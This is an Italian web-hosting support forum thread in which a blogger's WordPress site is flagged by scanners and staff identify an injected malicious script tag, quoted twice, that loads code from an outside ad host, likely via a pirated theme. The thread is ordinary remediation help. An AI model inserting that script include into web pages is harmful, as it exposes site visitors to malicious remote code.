Visualizzazione risultati 1 fino 23 di 23

Discussione: Blog con Malware?!?!

  1. #1
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito Blog con Malware?!?!

    Salve, questo il mio Blog https://sinefrenis.altervista.org
    Acuni scanner online identificano il mio sito come hackerato o con presenza di malware (non mi intendo di queste cose). In realtà non ho mai avuto alcun problema ma se potete darmi qualche rassicurazione in tal senso posso decidere se continuare o eliminare tutto il sito.
    Grazie

  2. #2
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,179

    Predefinito

    Quale scanner lo identifica? A me non sembra che ci sia alcun problema.

    Ciao!

  3. #3
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Ad esempio questi

    https://sitecheck.sucuri.net/results...altervista.org

    con questo warning

    for Google's UA
    <script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1622486"></script>

    E anche questo

    https://rescan.pro/result.php?2229bc...2ebeaf70e84faa
    Ultima modifica di SineFrenis : 23-11-2018 alle ore 21.40.01

  4. #4
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,179

    Predefinito

    È vero, è proprio quella riga a contenere codice dannoso:
    Codice:
    <script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1622486"></script>
    Scrivi all'abuse. Non so però se ti risponderanno nel weekend.

    Ciao!

  5. #5
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Se lo dici tu mi fido, io non ci capisco molto.

    Comunque ho scritto. Se c'è qualcosa che intanto mi consigli di fare o puoi fare per limitare eventuali problemi fammi sapere.

    Grazie

  6. #6
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,179

    Predefinito

    Molto probabilmente si è trattato o di qualche plugin corrotto o non opportunamente aggiornato.

    Per ora ti consiglierei di lasciare così e risolvere con l'abuse.

    Ciao!

  7. #7
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Non ottenendo alcuna risposta dall'abuse ho installato il plugin "wordfence alert" che dopo aver rilevato il malware mi ha permesso di eliminare i file "eliminabili" (almeno così c'era scritto); i files li ha eliminati talmente bene che il mio blog non è più raggiungibile.
    Brutta esperienza insomma.

  8. #8
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Citazione Originalmente inviato da SineFrenis Visualizza messaggio
    Non ottenendo alcuna risposta dall'abuse ho installato il plugin "wordfence alert" che dopo aver rilevato il malware mi ha permesso di eliminare i file "eliminabili" (almeno così c'era scritto); i files li ha eliminati talmente bene che il mio blog non è più raggiungibile.
    Brutta esperienza insomma.

    Come non detto, tornato online. grazie

  9. #9
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,179

    Predefinito

    Evita di utilizzare questo tipo di plugin. Attendi piuttosto l'intervento dell'abuse (ricordo che normalmente il weekend non lavorano, e comunque la risposta può non essere immediata.

    Ciao!

  10. #10
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Va bene, attenderò l'intervento dell'abuse, ma mentre ieri funzionava ora non funziona più.
    Vorrei solo recuperare i contenuti nel caso in cui venga deciso di eliminarlo. Grazie.

  11. #11
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Purtroppo dopo 1 settimana col sito offline non ho ancora avuto assistenza dall Abuse. Attendersi almeno una comunicazione in merito sarebbe un gesto molto apprezzato.
    Non essendo un web master la mia unica alternativa è migrare.

  12. #12
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,179

    Predefinito

    Citazione Originalmente inviato da SineFrenis Visualizza messaggio
    Purtroppo dopo 1 settimana col sito offline
    Il sito era online, però tre giorni fa è stato danneggiato appunto eseguendo wordfence.

    Ti sei assicurato di scrivere all'indirizzo corretto? Di solito capita che utenti scrivano a .org piuttosto che a .it.

    Ciao!

  13. #13
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Citazione Originalmente inviato da SineFrenis Visualizza messaggio
    Non ottenendo alcuna risposta dall'abuse ho installato il plugin "wordfence alert" che dopo aver rilevato il malware mi ha permesso di eliminare i file "eliminabili" (almeno così c'era scritto); i files li ha eliminati talmente bene che il mio blog non è più raggiungibile.
    Brutta esperienza insomma.
    Hai a disposizione dei backup antecedenti all'uso di questo plugin, per cominciare ti consiglierei di ripristinare quelli dopodiché potremo vedere il da farsi riguardo la compromissione del blog.

  14. #14
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Ho eseguito il backup, grazie.

  15. #15
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Ottimo, allora adesso ti consiglierei di effettuare il passaggio ad account Blog e rimuovere tutti i plugin e temi che non utilizzi, poi se confermi potremo provvedere con un intervento manuale per ripulire il blog dalla compromissione.

  16. #16
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Fatto. Potete procedere.

  17. #17
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Da dove hai scaricato il tema che hai attivo al momento? Stai usando l'ultima versione disponibile?

  18. #18
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Non ricordo assolutamente, ma sono abbastanza certo che non sia un vostro canale ufficiale e ricordo che lo avevo caricato via FTP.
    Guardando in giro sul web l'ho ritrovato su questo sito
    Se lo devo acquistare per risolvere facilmente il problema e se mi garantisci che questo sito è affidabile procedo subito.
    Grazie.
    Ultima modifica di SineFrenis : 06-12-2018 alle ore 12.43.14

  19. #19
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Se non l'hai acquistato ti consiglio di rimuoverlo immediatamente, quindi procedere all'acquisto e alla reinstallazione.

  20. #20
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Ok grazie, provvedo subito

  21. #21
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Ho installato il nuovo tema appena acquistato sul sito Envato, sembra tutto ok a parte questi errori che compaiono sulla console WP

    Redux Framework Warning
    select2-css CDN unavailable. Some controls may not render properly. Please wait a few minutes, then try refreshing the page. Unable to load some remotely hosted scripts..

    Redux Framework Warning
    select2-js CDN unavailable. Some controls may not render properly. Please wait a few minutes, then try refreshing the page. Unable to load some remotely hosted scripts..

    Redux Framework Warning
    ace-editor-js CDN unavailable. Some controls may not render properly. Please wait a few minutes, then try refreshing the page. Unable to load some remotely hosted scripts..

    Inoltre sono presenti malfunzionamenti su Facebook social counter e sul widget di Instagram per i quali ho già contattato lo sviluppatore sempre tramite il sito Envato. Mi chiede il WP Admin....che sarebbe? E' per caso l'accesso al mio WP? Devo inviargli le credenziali?

  22. #22
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,179

    Predefinito

    Per quanto riguarda Envato, prova sbloccando le connessioni server to server. Solitamente però ci sono problemi, vedi:
    http://forum.it.altervista.org/wordp...ml#post1361030

    http://forum.it.altervista.org/probl...group-com.html

    Per quanto riguarda gli altri problemi, per il Facebook Social Counter ti consiglierei di utilizzare gli strumenti che trovi su Promuovi. ANche il widget Instagram solitamente funziona correttamente, anche in questo caso prova sbloccando le connessioni server to server.

    Non dare mai le tue credenziali di accesso a nessuno.

    Ciao!

  23. #23
    SineFrenis non è connesso Neofita
    Data registrazione
    15-11-2015
    Messaggi
    23

    Predefinito

    Sono spariti i Warning e il counter di facebook ora funziona.

    Mi è rimasto questo malfunzionamento riguardante il widget instagram

    Warning: Invalid argument supplied for foreach() in /membri/sinefrenis/wp-content/themes/gloria/framework/widgets/widget_instagram.php on line 47

    Magari è un bug del tema! Ho letto che lo dovrebbe aver aggiustato nella versione 1.7.5, poi dovrebbe aver sistemato il social counter widget nell'ultima versione 1.7.6 (in mio possesso). Mi sa che non ha sistemato un granchè....

    Intanto grazie dell'aiuto.

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •